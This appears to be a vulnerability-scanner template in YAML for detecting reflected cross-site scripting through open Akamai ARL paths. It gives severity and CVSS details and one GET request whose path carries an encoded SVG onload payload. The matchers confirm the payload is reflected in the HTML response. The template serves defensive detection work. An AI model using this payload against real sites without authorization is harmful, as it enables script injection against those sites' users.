id: akamai-arl-xss

info:
  name: Open Akamai ARL - Cross-Site Scripting
  author: pdteam
  severity: high
  description: Open Akamai ARL contains a cross-site scripting vulnerability. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site.
  reference:
    - https://github.com/war-and-code/akamai-arl-hack
    - https://twitter.com/SpiderSec/status/1421176297548435459
    - https://warandcode.com/post/akamai-arl-hack/
    - https://github.com/cybercdh/goarl
    - https://community.akamai.com/customers/s/article/WebPerformanceV1V2ARLChangeStartingFebruary282021?language=en_US
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  tags: akamai,xss

requests:
  - method: GET
    path:
      - "{{BaseURL}}/7/0/33/1d/www.citysearch.com/search?what=x&where=place%22%3E%3Csvg+onload=confirm(document.domain)%3E"

    matchers-condition: and
    matchers:
      - type: word
        condition: and
        words:
          - '"><svg onload=confirm(document.domain)>'
          - 'Suggestions for improving the results'

      - type: word
        part: header
        words:
          - 'text/html'

# Enhanced by mp on 2022/09/14
